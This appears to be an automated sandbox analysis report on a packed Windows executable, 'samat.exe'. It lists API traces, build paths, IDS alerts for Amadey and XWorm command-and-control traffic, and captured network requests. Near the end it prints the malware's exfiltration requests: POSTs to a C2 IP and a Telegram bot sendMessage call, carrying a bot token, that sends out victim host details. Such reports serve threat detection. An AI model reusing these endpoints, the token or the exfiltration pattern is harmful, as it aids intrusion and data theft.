Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B7EBC5F0 PyArg_ParseTupleAndKeywords,??0PyWinBufferView@@QEAA@PEAU_object@@_N1@Z,PyEval_SaveThread,CryptDecryptMessage,PyEval_RestoreThread,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,malloc,PyErr_NoMemory,PyEval_SaveThread,CryptDecryptMessage,PyEval_RestoreThread,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,free,_Py_NoneStruct,_Py_NoneStruct,_Py_NewReference,PyBytes_FromStringAndSize,Py_BuildValue,free,??1PyWinBufferView@@QEAA@XZ,CertCloseStore,free, 8_2_00007FF8B7EBC5F0
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B7EB51E0 PyArg_ParseTupleAndKeywords,CryptReleaseContext,_Py_NoneStruct,_Py_NoneStruct,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z, 8_2_00007FF8B7EB51E0
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B7EBD9C0 _Py_NoneStruct,PyArg_ParseTupleAndKeywords,PyLong_AsVoidPtr,PyErr_Occurred,PyErr_Clear,PyBytes_AsString,PyExc_ValueError,PyErr_Format,_Py_NoneStruct,PyExc_NotImplementedError,PyErr_SetString,strcmp,malloc,PyExc_MemoryError,PyErr_Format,strcmp,PyExc_NotImplementedError,PyErr_Format,PyErr_Format,malloc,PyEval_SaveThread,CryptEncodeObjectEx,PyEval_RestoreThread,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,PyBytes_FromStringAndSize,strcmp,free,LocalFree, 8_2_00007FF8B7EBD9C0
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B7EBD5C0 _Py_NoneStruct,PyArg_ParseTupleAndKeywords,??0PyWinBufferView@@QEAA@PEAU_object@@_N1@Z,PyEval_SaveThread,CryptDecryptAndVerifyMessageSignature,PyEval_RestoreThread,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,malloc,PyErr_NoMemory,PyEval_SaveThread,CryptDecryptAndVerifyMessageSignature,PyEval_RestoreThread,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,free,_Py_NoneStruct,_Py_NoneStruct,_Py_NewReference,_Py_NoneStruct,_Py_NoneStruct,_Py_NewReference,PyBytes_FromStringAndSize,Py_BuildValue,free,??1PyWinBufferView@@QEAA@XZ,free,CertCloseStore,free, 8_2_00007FF8B7EBD5C0
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B7EB45B0 PyArg_ParseTupleAndKeywords,PyExc_TypeError,PyErr_SetString,CryptExportKey,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,malloc,PyExc_MemoryError,PyErr_Format,CryptExportKey,PyBytes_FromStringAndSize,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,free, 8_2_00007FF8B7EB45B0
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B7EB4180 PyArg_ParseTupleAndKeywords,CryptGetHashParam,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,malloc,PyExc_MemoryError,PyErr_Format,CryptGetHashParam,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,PyExc_NotImplementedError,PyErr_Format,PyBytes_FromStringAndSize,PyLong_FromUnsignedLong,free, 8_2_00007FF8B7EB4180
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B7EBB180 _Py_NoneStruct,PyArg_ParseTupleAndKeywords,??0PyWinBufferView@@QEAA@PEAU_object@@_N1@Z,?PyWinObject_AsWCHAR@@YAHPEAU_object@@PEAPEA_WHPEAK@Z,PyEval_SaveThread,CryptGetKeyIdentifierProperty,PyEval_RestoreThread,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,PyExc_NotImplementedError,PyErr_SetString,LocalFree,??1PyWinBufferView@@QEAA@XZ,PyMem_Free, 8_2_00007FF8B7EBB180
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B7EB596C PyArg_ParseTupleAndKeywords,CryptGetUserKey,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z, 8_2_00007FF8B7EB596C
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B7EB4560 CryptDestroyKey,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,_Py_NoneStruct,_Py_NoneStruct, 8_2_00007FF8B7EB4560
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B7EB3D30 PyArg_ParseTupleAndKeywords,??0PyWinBufferView@@QEAA@PEAU_object@@_N1@Z,CryptHashData,_Py_NoneStruct,_Py_NoneStruct,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,??1PyWinBufferView@@QEAA@XZ, 8_2_00007FF8B7EB3D30
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B7EBB520 _Py_NoneStruct,PyArg_ParseTupleAndKeywords,?init@PyWinBufferView@@QEAA_NPEAU_object@@_N1@Z,?PyWinObject_AsWCHAR@@YAHPEAU_object@@PEAPEA_WHPEAK@Z,PyList_New,PyEval_SaveThread,CryptEnumKeyIdentifierProperties,PyEval_RestoreThread,_Py_Dealloc,PyErr_Occurred,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,??1PyWinBufferView@@QEAA@XZ,PyMem_Free, 8_2_00007FF8B7EBB520
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B7EB5110 CryptReleaseContext, 8_2_00007FF8B7EB5110
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B7EBD100 PyArg_ParseTupleAndKeywords,PyEval_SaveThread,CryptSignMessage,PyEval_RestoreThread,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,malloc,PyExc_MemoryError,PyErr_Format,PyEval_SaveThread,CryptSignMessage,PyEval_RestoreThread,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,PyBytes_FromStringAndSize,CertFreeCertificateContext,free,free,free,free, 8_2_00007FF8B7EBD100
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B834CD30 CRYPTO_free,CRYPTO_free,CRYPTO_free_ex_data,OPENSSL_LH_free,X509_STORE_free,CTLOG_STORE_free,OPENSSL_sk_free,OPENSSL_sk_free,OPENSSL_sk_free,OPENSSL_sk_pop_free,OPENSSL_sk_pop_free,OPENSSL_sk_pop_free,OPENSSL_sk_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_secure_free,EVP_MD_get0_provider,EVP_MD_free,EVP_MD_get0_provider,EVP_MD_free,EVP_CIPHER_get0_provider,EVP_CIPHER_free,EVP_MD_get0_provider,EVP_MD_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_THREAD_lock_free,CRYPTO_free,CRYPTO_free, 8_2_00007FF8B834CD30
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B8381970 ERR_new,ERR_set_debug,EVP_PKEY_get1_encoded_public_key,CRYPTO_free,ERR_new,ERR_set_debug,EVP_PKEY_free,CRYPTO_free, 8_2_00007FF8B8381970
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B83AB900 BN_bin2bn,ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_strdup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug, 8_2_00007FF8B83AB900
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B833F910 ERR_new,ERR_set_debug,EVP_PKEY_CTX_new_from_pkey,CRYPTO_malloc,CRYPTO_malloc,EVP_PKEY_encapsulate,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_clear_free,CRYPTO_free,EVP_PKEY_CTX_free, 8_2_00007FF8B833F910
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B8331E6A ERR_new,ERR_set_debug,CRYPTO_clear_free, 8_2_00007FF8B8331E6A
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B8331A41 CRYPTO_free,CRYPTO_memdup,ERR_new,ERR_set_debug,memcmp,ERR_new,ERR_set_debug,CRYPTO_memdup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug, 8_2_00007FF8B8331A41
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B833105F ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,CRYPTO_clear_free,CRYPTO_clear_free, 8_2_00007FF8B833105F
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B837D980 RAND_bytes_ex,CRYPTO_malloc,memset, 8_2_00007FF8B837D980
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B83311DB EVP_PKEY_free,X509_free,EVP_PKEY_free,OPENSSL_sk_pop_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,X509_STORE_free,X509_STORE_free,CRYPTO_free,CRYPTO_THREAD_lock_free,CRYPTO_free, 8_2_00007FF8B83311DB
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B8393A60 ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_PKEY_get1_encoded_public_key,ERR_new,ERR_set_debug,EVP_PKEY_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_free,EVP_PKEY_free, 8_2_00007FF8B8393A60
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B8347A60 CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,CRYPTO_malloc,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error,strncmp,CRYPTO_free,CRYPTO_free,OPENSSL_sk_new_null,CRYPTO_free,OPENSSL_sk_num,OPENSSL_sk_value,OPENSSL_sk_push,OPENSSL_sk_delete,OPENSSL_sk_num,OPENSSL_sk_push,CRYPTO_free,OPENSSL_sk_free,CRYPTO_free,OPENSSL_sk_free, 8_2_00007FF8B8347A60
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B8379A60 ERR_new,ERR_set_debug,EVP_MD_CTX_get0_md,EVP_MD_get_size,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_memcmp,ERR_set_mark,ERR_pop_to_mark,ERR_new,ERR_set_debug,ERR_clear_last_mark,EVP_MD_CTX_get0_md,CRYPTO_memcmp,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_free, 8_2_00007FF8B8379A60
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B8373A00 CRYPTO_free,CRYPTO_free,OPENSSL_cleanse,CRYPTO_free,CRYPTO_free,OPENSSL_cleanse,CRYPTO_free,CRYPTO_free, 8_2_00007FF8B8373A00
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B8331A15 CRYPTO_THREAD_write_lock,CRYPTO_THREAD_unlock, 8_2_00007FF8B8331A15
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B839BA20 CRYPTO_free,CRYPTO_free,CRYPTO_free, 8_2_00007FF8B839BA20
Uses 32bit PE files
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File created: C:\Users\user\AppData\Local\Temp\_MEI52282\setuptools\_vendor\wheel-0.43.0.dist-info\LICENSE.txt Jump to behavior
Source: unknown HTTPS traffic detected: 188.165.52.14:443 -> 192.168.2.5:49824 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:50152 version: TLS 1.2
Source: Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: samat.exe, 00000007.00000003.3000614985.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4574676544.00007FF8B8327000.00000002.00000001.01000000.0000001E.sdmp
Source: Binary string: D:\a\1\b\libcrypto-3.pdb| source: samat.exe, 00000008.00000002.4568570169.00007FF8A882A000.00000002.00000001.01000000.00000015.sdmp
Source: Binary string: D:\a\1\b\libssl-3.pdbDD source: samat.exe, 00000008.00000002.4575346345.00007FF8B83B5000.00000002.00000001.01000000.00000019.sdmp
Source: Binary string: D:\a\pywin32\pywin32\build\temp.win-amd64-cpython-313\Release\pywintypes.pdb** source: samat.exe, 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_wmi.pdb(('GCTL source: samat.exe, 00000007.00000003.2989752396.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4586592016.00007FF8BA504000.00000002.00000001.01000000.00000010.sdmp
Source: Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG"OpenSSL 3.0.15 3 Sep 20243.0.15built on: Wed Sep 4 15:52:04 2024 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-3"MODULESDIR: "C:\Program Files\OpenSSL\lib\ossl-modules"CPUINFO: N/Anot availableget_and_lock..\s\crypto\ex_data.cossl_crypto_get_ex_new_index_exossl_crypto_new_ex_data_exCRYPTO_dup_ex_dataCRYPTO_set_ex_dataOPENSSL_WIN32_UTF8..\s\crypto\getenv.ccompiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG";CPUINFO: OPENSSL_ia32cap=0x%llx:0x%llxOPENSSL_ia32cap env:%sos-specificC:\Program Files\Common Files\SSLC:\Program Files\OpenSSL\lib\ossl-modules.dllCPUINFO: ..\s\crypto\init.cOPENSSL_init_cryptoOPENSSL_atexit..\s\crypto\initthread.c..\s\crypto\mem_sec.cassertion failed: (bit & 1) == 0assertion failed: list >= 0 && list < sh.freelist_sizeassertion failed: ((ptr - sh.arena) & ((sh.arena_size >> list) - 1)) == 0assertion failed: bit > 0 && bit < sh.bittable_sizeassertion failed: TESTBIT(table, bit)assertion failed: !TESTBIT(table, bit)assertion failed: WITHIN_FREELIST(list)assertion failed: WITHIN_ARENA(ptr)assertion failed: temp->next == NULL || WITHIN_ARENA(temp->next)assertion failed: (char **)temp->next->p_next == listassertion failed: WITHIN_FREELIST(temp2->p_next) || WITHIN_ARENA(temp2->p_next)assertion failed: size > 0assertion failed: (size & (size - 1)) == 0assertion failed: (minsize & (minsize - 1)) == 0assertion failed: sh.freelist != NULLassertion failed: sh.bittable != NULLassertion failed: sh.bitmalloc != NULLassertion failed: !sh_testbit(temp, slist, sh.bitmalloc)assertion failed: temp != sh.freelist[slist]assertion failed: sh.freelist[slist] == tempassertion failed: temp-(sh.arena_size >> slist) == sh_find_my_buddy(temp, slist)assertion failed: sh_testbit(chunk, list, sh.bittable)assertion failed: WITHIN_ARENA(chunk)assertion failed: sh_testbit(ptr, list, sh.bittable)assertion failed: ptr == sh_find_my_buddy(buddy, list)assertion failed: ptr != NULLassertion failed: !sh_testbit(ptr, list, sh.bitmalloc)assertion failed: sh.freelist[list] == ptr/*0123456789ABCDEFCRYPTO_memdup..\s\crypto\o_str.chexstr2buf_sepossl_hexstr2buf_sepbuf2hexstr_sepossl_buf2hexstr_sep..\s\crypto\packet.cwpacket_intern_init_lenWPACKET_start_sub_packet_len__..\s\crypto\param_build.cparam_pushparam_push_numOSSL_PARAM_BLD_push_BN_padNegative big numbers are unsupported for OSSL_PARAMOSSL_PARAM_BLD_push_utf8_stringOSSL_PARAM_BLD_push_utf8_ptrOSSL_PARAM_BLD_push_octet_stringOSSL_PARAM_BLD_p
Source: Binary string: D:\a\1\b\bin\amd64\_overlapped.pdb source: samat.exe, 00000007.00000003.2988764438.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: samat.exe, 00000007.00000003.2987011870.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4588139749.00007FF8BFB14000.00000002.00000001.01000000.0000000B.sdmp
Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG" source: samat.exe, 00000008.00000002.4568570169.00007FF8A8792000.00000002.00000001.01000000.00000015.sdmp
Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: samat.exe, 00000007.00000003.2987011870.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4588139749.00007FF8BFB14000.00000002.00000001.01000000.0000000B.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\sqlite3.pdb source: samat.exe, 00000008.00000002.4573616995.00007FF8B8114000.00000002.00000001.01000000.0000001B.sdmp
Source: Binary string: D:\a\1\b\libcrypto-3.pdb source: samat.exe, 00000008.00000002.4568570169.00007FF8A882A000.00000002.00000001.01000000.00000015.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_multiprocessing.pdb source: samat.exe, 00000007.00000003.2988647616.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\a\pywin32\pywin32\build\temp.win-amd64-cpython-313\Release\win32crypt.pdb!! source: samat.exe, 00000008.00000002.4572761166.00007FF8B7EC2000.00000002.00000001.01000000.00000031.sdmp
Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdb source: samat.exe, 00000007.00000003.2987209081.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4586255750.00007FF8BA4F5000.00000002.00000001.01000000.00000011.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\select.pdb source: samat.exe, 00000007.00000003.2997008876.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4585287094.00007FF8B9843000.00000002.00000001.01000000.00000017.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_ctypes.pdb source: samat.exe, 00000008.00000002.4587381995.00007FF8BFAC3000.00000002.00000001.01000000.0000000C.sdmp
Source: Binary string: D:\a\pywin32\pywin32\build\temp.win-amd64-cpython-313\Release\pywintypes.pdb source: samat.exe, 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: samat.exe, 00000007.00000003.2988317313.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4585606922.00007FF8B9F66000.00000002.00000001.01000000.00000014.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdbNN source: samat.exe, 00000007.00000003.2988479692.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4584509371.00007FF8B919B000.00000002.00000001.01000000.0000000F.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_asyncio.pdb source: samat.exe, 00000007.00000003.2987342767.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\pyexpat.pdb source: samat.exe, 00000008.00000002.4583959875.00007FF8B9162000.00000002.00000001.01000000.00000012.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_queue.pdb source: samat.exe, 00000007.00000003.2988899702.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4585930207.00007FF8B9F73000.00000002.00000001.01000000.00000013.sdmp
Source: Binary string: D:\a\pywin32\pywin32\build\temp.win-amd64-cpython-313\Release\win32crypt.pdb source: samat.exe, 00000008.00000002.4572761166.00007FF8B7EC2000.00000002.00000001.01000000.00000031.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: samat.exe, 00000007.00000003.2988479692.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4584509371.00007FF8B919B000.00000002.00000001.01000000.0000000F.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: samat.exe, 00000007.00000003.2987489165.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4586952230.00007FF8BA51D000.00000002.00000001.01000000.0000000E.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_wmi.pdb source: samat.exe, 00000007.00000003.2989752396.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4586592016.00007FF8BA504000.00000002.00000001.01000000.00000010.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: samat.exe, 00000007.00000003.2989050874.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4584962997.00007FF8B93C9000.00000002.00000001.01000000.00000016.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_sqlite3.pdb source: samat.exe, 00000008.00000002.4582141897.00007FF8B90FF000.00000002.00000001.01000000.0000001A.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\python313.pdb source: samat.exe, 00000008.00000002.4569745344.00007FF8A8CF8000.00000002.00000001.01000000.0000000A.sdmp
Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdbGCTL source: samat.exe, 00000007.00000003.2987209081.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4586255750.00007FF8BA4F5000.00000002.00000001.01000000.00000011.sdmp
Source: Binary string: D:\a\1\b\libssl-3.pdb source: samat.exe, 00000008.00000002.4575346345.00007FF8B83B5000.00000002.00000001.01000000.00000019.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_ssl.pdb source: samat.exe, 00000008.00000002.4582488584.00007FF8B911E000.00000002.00000001.01000000.00000018.sdmp
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 7_2_00007FF7E12C9280 FindFirstFileExW,FindClose, 7_2_00007FF7E12C9280
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 7_2_00007FF7E12C83C0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW, 7_2_00007FF7E12C83C0
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 7_2_00007FF7E12E1874 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose, 7_2_00007FF7E12E1874
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF7E12C9280 FindFirstFileExW,FindClose, 8_2_00007FF7E12C9280
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF7E12C83C0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW, 8_2_00007FF7E12C83C0
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF7E12E1874 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose, 8_2_00007FF7E12E1874
Source: chrome.exe Memory has grown: Private usage: 11MB later: 27MB

Networking
barindex
Suricata IDS alerts for network traffic
Source: Network traffic Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.5:49812 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.2.5:49818
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.5:49880 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.5:50124 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.5:50148 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.2.5:50146
Source: Network traffic Suricata IDS: 2852870 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes : 87.120.112.33:8398 -> 192.168.2.5:50155
Source: Network traffic Suricata IDS: 2852923 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) : 192.168.2.5:50155 -> 87.120.112.33:8398
Source: Network traffic Suricata IDS: 2858924 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Command - Ping Inbound : 87.120.112.33:8398 -> 192.168.2.5:50155
Source: Network traffic Suricata IDS: 2852870 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes : 87.120.112.33:8398 -> 192.168.2.5:50179
Source: Network traffic Suricata IDS: 2853685 - Severity 1 - ETPRO MALWARE Win32/XWorm Checkin via Telegram : 192.168.2.5:50152 -> 149.154.167.220:443
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor IPs: 185.215.113.43
Uses the Telegram API (likely for C&C communication)
Source: unknown DNS query: name: api.telegram.org
Source: unknown DNS query: name: api.telegram.org
Source: unknown DNS query: name: api.telegram.org
Detected non-DNS traffic on DNS port
Source: global traffic TCP traffic: 192.168.2.5:49822 -> 1.1.1.1:53
Source: global traffic TCP traffic: 192.168.2.5:50104 -> 1.1.1.1:53
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /samat.exe HTTP/1.1Host: thedotmediagroup.com
Source: global traffic HTTP traffic detected: GET /bot6673004050:AAEcDfPnnGAswDvyrn9-bkOySVSnbPqLnBU/sendMessage?chat_id=1470436579&text=%E2%98%A0%20%5BXWorm%20V5.6%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A6513EFE8757A60506E5F%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20EVTO372NG%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.6 HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
